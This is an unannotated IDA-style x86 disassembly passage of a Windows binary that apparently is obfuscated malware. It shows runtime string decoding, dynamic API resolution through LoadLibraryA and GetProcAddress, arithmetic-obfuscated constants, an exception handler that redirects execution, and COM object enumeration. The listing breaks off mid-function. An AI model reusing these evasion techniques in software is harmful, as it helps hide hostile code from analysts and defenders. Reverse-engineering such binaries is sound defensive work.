mov eax, dword_44B1CC
add eax, dword_44B14C
sub eax, 0Ah
cmp ebx, eax
jnz loc_43FE7C
mov eax, dword_44B118
add eax, dword_44B1CC
sub eax, 4
neg eax
mov [ebp+var_40E5C], eax
push offset dword_44C29C
call sub_43EFD7
push eax
call ds:dword_445044
mov [ebp+var_30E44], eax
push offset dword_44C28C
call sub_43EFD7
add esp, 8
push eax
call ds:dword_445044
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_444B60
loc_43F32F: ; CODE XREF: sub_43F0EA+D66�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
movsx eax, word_44B194
add eax, dword_44B0CC
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_43F3A2
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44B0E4
movsx edx, word_44B148
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_43FE3E
push offset byte_44C27D
call sub_4424C1
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_445020
add esp, 0Ch
jmp loc_43F4C8
; ---------------------------------------------------------------------------
loc_43F3A2: ; CODE XREF: sub_43F0EA+268�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push offset dword_44C94C
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B150
movsx edx, word_44B110
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_43FE3E
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, dword_44B1B8
add eax, dword_44B138
sub eax, 0Bh
cmp ebx, eax
jz short loc_43F44A
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_43FE3E
; ---------------------------------------------------------------------------
loc_43F44A: ; CODE XREF: sub_43F0EA+34D�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
movsx eax, word_44B194
movsx edx, word_44B0B0
add eax, edx
sub eax, 8
cmp ebx, eax
jz short loc_43F493
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_43FE3E
; ---------------------------------------------------------------------------
loc_43F493: ; CODE XREF: sub_43F0EA+38A�j
push offset word_44C26E
call sub_4424C1
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44A634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
add esp, 18h
loc_43F4C8: ; CODE XREF: sub_43F0EA+2B3�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44B0B8
add eax, dword_44B15C
sub eax, 8
cmp ebx, eax
jnz loc_43FE3E
movsx eax, word_44B0C8
sub eax, 7
mov [ebp+var_30E50], eax
jmp loc_43FE2C
; ---------------------------------------------------------------------------
loc_43F508: ; CODE XREF: sub_43F0EA+D4E�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word_44B0B0
mov edx, dword_44B198
sub edx, 8
mov [ebp+eax+var_50EA3], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44B108
add eax, dword_44B094
sub eax, 6
cmp ebx, eax
jnz loc_43FE26
push offset dword_44C260
call sub_4424C1
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44A634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push offset dword_44C90C
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B1A0
sub eax, 6
cmp ebx, eax
jnz loc_43FAAA
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov eax, dword_44B0A4
add eax, dword_44B0F0
sub eax, 6
cmp ebx, eax
jnz loc_43FA9E
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_43A9C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call ds:dword_44ABA0
mov eax, dword_44B14C
movsx edx, word_44B1A8
add eax, edx
sub eax, 6
mov [ebp+var_40E9C], eax
jmp short loc_43F6B2
; ---------------------------------------------------------------------------
loc_43F65E: ; CODE XREF: sub_43F0EA+5D4�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
mov edx, dword_44B0A0
add edx, 6
movsx ecx, word_44B148
add edx, ecx
cmp eax, edx
jz short loc_43F695
mov edx, dword_44B108
add edx, 0Ah
add edx, dword_44B1A4
cmp eax, edx
jnz short loc_43F6AC
loc_43F695: ; CODE XREF: sub_43F0EA+596�j
mov eax, [ebp+var_40E9C]
movsx edx, word_44B0F4
sub edx, 9
mov [ebp+eax+var_60E9F], dl
loc_43F6AC: ; CODE XREF: sub_43F0EA+5A9�j
inc [ebp+var_40E9C]
loc_43F6B2: ; CODE XREF: sub_43F0EA+572�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_43F65E
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_444B60
mov eax, dword_44B0F0
add eax, dword_44B130
sub eax, 4
mov [ebp+var_40E9C], eax
loc_43F6E7: ; CODE XREF: sub_43F0EA+737�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_43F6F7: ; CODE XREF: sub_43F0EA+612�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F6F7
mov [ebp+var_60EA8], eax
mov edx, dword_44B0FC
sub edx, 7
cmp eax, edx
jz short loc_43F727
mov edx, dword_44B094
add edx, 0BFh
add edx, dword_44B0A8
cmp eax, edx
jbe short loc_43F72C
loc_43F727: ; CODE XREF: sub_43F0EA+625�j
jmp loc_43F7FE
; ---------------------------------------------------------------------------
loc_43F72C: ; CODE XREF: sub_43F0EA+63B�j
mov eax, dword_44B0EC
add eax, dword_44B098
sub eax, 0Ch
mov [ebp+var_60EA4], eax
jmp short loc_43F76F
; ---------------------------------------------------------------------------
loc_43F742: ; CODE XREF: sub_43F0EA+691�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
mov edx, dword_44B1C4
add edx, 19h
add edx, dword_44B0E4
cmp eax, edx
jnz short loc_43F77D
inc [ebp+var_60EA4]
loc_43F76F: ; CODE XREF: sub_43F0EA+656�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_43F742
loc_43F77D: ; CODE XREF: sub_43F0EA+67D�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_43F7FE
push dword_44B0CC
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_43D744
add esp, 0Ch
mov [ebp+var_60EDC], eax
movsx eax, word_44B128
add eax, 0FFFFh
cmp [ebp+var_60EDC], eax
jnz short loc_43F7FE
push offset byte_44C25B
call sub_4424C1
push eax
lea edi, [ebp+var_50E9B]
push edi
call ds:dword_445020
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call ds:dword_445020
add esp, 14h
loc_43F7FE: ; CODE XREF: sub_43F0EA:loc_43F727�j
; sub_43F0EA+69F�j ...
mov eax, [ebp+var_60EA8]
mov edx, dword_44B0FC
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_43F6E7
movsx eax, word_44B100
add eax, dword_44B1B4
sub eax, 0Ah
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_43F846: ; CODE XREF: sub_43F0EA+761�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F846
mov [ebp+var_60EA8], eax
mov eax, dword_44B1C8
add eax, dword_44B164
sub eax, 2
mov [ebp+var_40E9C], eax
jmp loc_43FA76
; ---------------------------------------------------------------------------
loc_43F86C: ; CODE XREF: sub_43F0EA+998�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44B17C
add edx, 1Ah
cmp eax, edx
jz short loc_43F88E
and [ebp+var_60EAC], 0
loc_43F88E: ; CODE XREF: sub_43F0EA+79B�j
mov eax, dword_44B15C
mov edx, [ebp+var_40E9C]
movzx edx, [ebp+edx+var_50E9B]
lea eax, [eax+eax+18h]
cmp edx, eax
jnz loc_43FA21
mov eax, dword_44B130
add eax, dword_44B0E4
sub eax, 2
cmp [ebp+var_40E9C], eax
jbe loc_43F97D
mov eax, [ebp+var_40E9C]
movsx edx, word_44B0B0
movsx ecx, word_44B170
add edx, ecx
sub edx, 0Fh
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B0FC
add edx, 13h
movsx ecx, word_44B0DC
add edx, ecx
cmp eax, edx
jle short loc_43F91F
mov edx, dword_44B140
add edx, 24h
add edx, dword_44B1AC
cmp eax, edx
jl short loc_43F973
loc_43F91F: ; CODE XREF: sub_43F0EA+820�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B17C
add edx, 30h
movsx ecx, word_44B148
add edx, ecx
cmp eax, edx
jle short loc_43F951
movsx edx, word_44B1BC
mov ecx, dword_44B1B0
lea edx, [edx+ecx+3Bh]
cmp eax, edx
jl short loc_43F973
loc_43F951: ; CODE XREF: sub_43F0EA+850�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B1C0
add edx, 77h
cmp eax, edx
jle short loc_43F97D
movsx edx, word_44B148
add edx, 7Ch
cmp eax, edx
jge short loc_43F97D
loc_43F973: ; CODE XREF: sub_43F0EA+833�j
; sub_43F0EA+865�j
mov [ebp+var_60EAC], 1
loc_43F97D: ; CODE XREF: sub_43F0EA+7D7�j
; sub_43F0EA+879�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_43FA21
mov eax, [ebp+var_40E9C]
mov edx, dword_44B104
sub edx, 2
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
movsx edx, word_44B100
add edx, 17h
cmp eax, edx
jle short loc_43F9CF
mov edx, dword_44B1B8
add edx, 2Dh
cmp eax, edx
jl short loc_43FA17
loc_43F9CF: ; CODE XREF: sub_43F0EA+8D6�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B0F8
add edx, 37h
cmp eax, edx
jle short loc_43F9F0
mov edx, dword_44B0A4
add edx, 3Fh
cmp eax, edx
jl short loc_43FA17
loc_43F9F0: ; CODE XREF: sub_43F0EA+8F7�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B1B4
add edx, 75h
add edx, dword_44B0F0
cmp eax, edx
jle short loc_43FA21
mov edx, dword_44B15C
add edx, 7Bh
cmp eax, edx
jge short loc_43FA21
loc_43FA17: ; CODE XREF: sub_43F0EA+8E3�j
; sub_43F0EA+904�j
mov [ebp+var_60EAC], 1
loc_43FA21: ; CODE XREF: sub_43F0EA+7BD�j
; sub_43F0EA+89F�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_43FA4A
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_43FA4A: ; CODE XREF: sub_43F0EA+93E�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word_44B0D8
add edx, 1Bh
cmp eax, edx
jnz short loc_43FA70
mov [ebp+var_60EAC], 1
loc_43FA70: ; CODE XREF: sub_43F0EA+97A�j
inc [ebp+var_40E9C]
loc_43FA76: ; CODE XREF: sub_43F0EA+77D�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_43F86C
mov eax, [ebp+var_60EB4]
mov edx, dword_44B190
sub edx, 3
mov [ebp+eax+var_50E9B], dl
loc_43FA9E: ; CODE XREF: sub_43F0EA+52B�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FAAA: ; CODE XREF: sub_43F0EA+4FD�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push offset dword_44C92C
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B188
add eax, dword_44B14C
sub eax, 6
cmp ebx, eax
jnz loc_43FDBC
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word_44B0E0
cmp ebx, eax
jnz loc_43FDB0
mov eax, dword_44B1B0
mov [ebp+var_50EA0], eax
jmp loc_43FD9E
; ---------------------------------------------------------------------------
loc_43FB19: ; CODE XREF: sub_43F0EA+CC0�j
movsx eax, word_44B090
dec eax
push eax
call ds:dword_44A630
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp+var_50EA0]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
movsx eax, word_44B128
movsx edx, word_44B0D8
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_43FD98
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push offset dword_44C90C
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B118
movsx edx, word_44B0D8
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_43FD8C
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44B1B8
movsx edx, word_44B168
add eax, edx
sub eax, 0Bh
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_43FC0B
cmp [ebp+var_60EF0], 8
jz short loc_43FC10
loc_43FC0B: ; CODE XREF: sub_43F0EA+B15�j
jmp loc_43FD80
; ---------------------------------------------------------------------------
loc_43FC10: ; CODE XREF: sub_43F0EA+B1F�j
mov eax, dword_44B1AC
add eax, dword_44B1C4
mov edx, dword_44B0A0
sub edx, 4
mov byte ptr [ebp+eax+var_70EF8], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_43A9C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call ds:dword_44ABA0
movsx eax, word_44B0BC
movsx eax, byte ptr [ebp+eax+var_70EF8]
movsx edx, word_44B0C8
movsx ecx, word_44B170
add edx, ecx
sub edx, 0Fh
cmp eax, edx
jz loc_43FD80
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_44108E
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44B0A0
sub eax, 4
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44B098
mov edx, dword_44B144
add edx, dword_44B1B4
sub edx, 6
mov [ebp+eax+var_71F0E], dl
or ebx, ebx
jnz short loc_43FD0B
cmp [ebp+var_60EF0], 8
jnz short loc_43FD0B
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_43A9C0
add esp, 8
mov edi, eax
inc edi
mov [ebp-71F10h], edi
push [ebp+var_60EE8]
call ds:dword_44ABA0
loc_43FD0B: ; CODE XREF: sub_43F0EA+BEB�j
; sub_43F0EA+BF5�j
push offset byte_44C253
call sub_4424C1
push [ebp+var_50EA0]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44A634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
push offset word_44C24E
call sub_4424C1
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_445020
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
add esp, 34h
loc_43FD80: ; CODE XREF: sub_43F0EA:loc_43FC0B�j
; sub_43F0EA+B8F�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FD8C: ; CODE XREF: sub_43F0EA+AE0�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FD98: ; CODE XREF: sub_43F0EA+AA2�j
inc [ebp+var_50EA0]
loc_43FD9E: ; CODE XREF: sub_43F0EA+A2A�j
mov eax, [ebp+var_60EBC]
cmp [ebp+var_50EA0], eax
jb loc_43FB19
loc_43FDB0: ; CODE XREF: sub_43F0EA+A19�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FDBC: ; CODE XREF: sub_43F0EA+9F5�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, dword_44B0F8
movsx ecx, word_44B180
add edx, ecx
sub edx, 8
cmp eax, edx
jz short loc_43FE26
push offset byte_44C24B
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
push offset word_44C246
call sub_4424C1
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_445020
add esp, 1Ch
loc_43FE26: ; CODE XREF: sub_43F0EA+493�j
; sub_43F0EA+CF9�j
inc [ebp+var_30E50]
loc_43FE2C: ; CODE XREF: sub_43F0EA+419�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_43F508
loc_43FE3E: ; CODE XREF: sub_43F0EA+292�j
; sub_43F0EA+31F�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_43F32F
lea eax, [ebp+var_30D40]
push eax
call ds:dword_44A62C
pop ecx
push [ebp+var_30E44]
call ds:dword_44ABA0
push [ebp+var_30E48]
call ds:dword_44ABA0
loc_43FE7C: ; CODE XREF: sub_43F0EA+1E5�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FE88: ; CODE XREF: sub_43F0EA+1BA�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FE94: ; CODE XREF: sub_43F0EA+195�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FEA0: ; CODE XREF: sub_43F0EA+B9�j
; sub_43F0EA:loc_43F1F7�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43FEAC: ; CODE XREF: sub_43F0EA+53�j
; sub_43F0EA+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F0EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FEB1 proc near ; CODE XREF: sub_442C0A+244�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
movsx eax, word_44B148
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_43FEDF
; ---------------------------------------------------------------------------
loc_43FEC9: ; CODE XREF: sub_43FEB1+3B�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and ds:dword_448370[eax], 0
inc [ebp+var_4]
loc_43FEDF: ; CODE XREF: sub_43FEB1+16�j
movsx eax, word_44B194
add eax, 64h
cmp [ebp+var_4], eax
jb short loc_43FEC9
push 0
call ds:dword_4470D0
push offset dword_44B2D4
push offset dword_44C95C
push 7
push 0
push offset dword_44C89C
call ds:dword_447620
mov ebx, eax
movsx eax, word_44B0B0
movsx edx, word_44B0E0
add eax, edx
sub eax, 8
cmp ebx, eax
jnz loc_4400DB
lea eax, [ebp+var_C]
push eax
mov eax, dword_44B2D4
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
movsx eax, word_44B19C
add eax, dword_44B188
sub eax, 6
cmp ebx, eax
jnz short loc_43FF67
mov eax, dword_44B0C0
movsx edx, word_44B0DC
add eax, edx
sub eax, 7
cmp [ebp+var_C], eax
jnz short loc_43FF6C
loc_43FF67: ; CODE XREF: sub_43FEB1+9E�j
jmp loc_440073
; ---------------------------------------------------------------------------
loc_43FF6C: ; CODE XREF: sub_43FEB1+B4�j
mov eax, dword_44B12C
add eax, dword_44B13C
sub eax, 7
mov [ebp+var_8], eax
jmp loc_440067
; ---------------------------------------------------------------------------
loc_43FF82: ; CODE XREF: sub_43FEB1+1BC�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44B2D4
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
cmp ebx, dword_44B130
jnz loc_440064
lea eax, [ebp+var_40]
push eax
push offset dword_44C97C
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B1CC
movsx edx, word_44B0D8
add eax, edx
sub eax, 9
cmp ebx, eax
jnz short loc_44005B
lea eax, off_44B2D0
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push offset dword_44C8BC
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B194
movsx edx, word_44B180
add eax, edx
sub eax, 6
cmp ebx, eax
jnz short loc_440049
lea eax, [ebp+var_48]
push eax
push offset dword_44C8BC
push [ebp+var_44]
push [ebp+var_40]
call sub_4434B2
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_440049: ; CODE XREF: sub_43FEB1+173�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44005B: ; CODE XREF: sub_43FEB1+135�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_440064: ; CODE XREF: sub_43FEB1+104�j
inc [ebp+var_8]
loc_440067: ; CODE XREF: sub_43FEB1+CC�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_43FF82
loc_440073: ; CODE XREF: sub_43FEB1:loc_43FF67�j
lea eax, off_44B2F4
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push offset dword_44C8AC
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push offset dword_44C8AC
push [ebp+var_14]
push dword_44B2D4
call sub_4434B2
add esp, 10h
mov [ebp+var_18], eax
movsx ecx, word_44B0D0
cmp eax, ecx
jnz short loc_4400DB
mov eax, dword_44B2D4
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_44B2D4, 0
loc_4400DB: ; CODE XREF: sub_43FEB1+75�j
; sub_43FEB1+216�j
pop edi
pop esi
pop ebx
leave
retn
sub_43FEB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4400E0 proc near ; DATA XREF: .data:off_44B294�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44C96C
push esi
call ds:dword_44A644
or eax, eax
jz short loc_44010C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440154
; ---------------------------------------------------------------------------
loc_44010C: ; CODE XREF: sub_4400E0+1A�j
push offset dword_44C8EC
push esi
call ds:dword_44A644
or eax, eax
jz short loc_44012C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440154
; ---------------------------------------------------------------------------
loc_44012C: ; CODE XREF: sub_4400E0+3A�j
push offset dword_44C8CC
push esi
call ds:dword_44A644
or eax, eax
jz short loc_44014C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440154
; ---------------------------------------------------------------------------
loc_44014C: ; CODE XREF: sub_4400E0+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_440154: ; CODE XREF: sub_4400E0+2A�j
; sub_4400E0+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_4400E0 endp
; =============== S U B R O U T I N E =======================================
sub_44015B proc near ; CODE XREF: sub_442C0A+2F�p
push edi
push offset word_44C236
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1F8, eax
test eax, eax
jnz short loc_44018E
push offset word_44C226
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1F8, eax
loc_44018E: ; CODE XREF: sub_44015B+1A�j
push offset byte_44C215
call sub_4424C1
push eax
push dword_44B1F8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_4475EC, eax
push offset byte_44C201
call sub_4424C1
push eax
push dword_44B1F8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44503C, eax
push offset word_44C1F2
call sub_4424C1
add esp, 0Ch
push eax
push dword_44B1F8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A618, eax
pop edi
retn
sub_44015B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4401E7 proc near ; DATA XREF: sub_43B4C6+B�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov esi, [ebp+arg_8]
mov eax, offset sub_442652
mov [esi+0B8h], eax
mov eax, [ebp+arg_4]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
sub_4401E7 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44020A proc near ; DATA XREF: .data:0044B2BC�o
push ebp
mov ebp, esp
mov eax, dword_44B18C
dec eax
cmp ds:dword_44ABA8, eax
jbe short loc_440226
push offset dword_44ABA8
call ds:dword_445010 ; InterlockedDecrement
loc_440226: ; CODE XREF: sub_44020A+F�j
mov eax, ds:dword_44ABA8
pop ebp
retn 4
sub_44020A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44022F proc near ; CODE XREF: sub_43E1CC+C2�p
; sub_43E1CC+FF�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
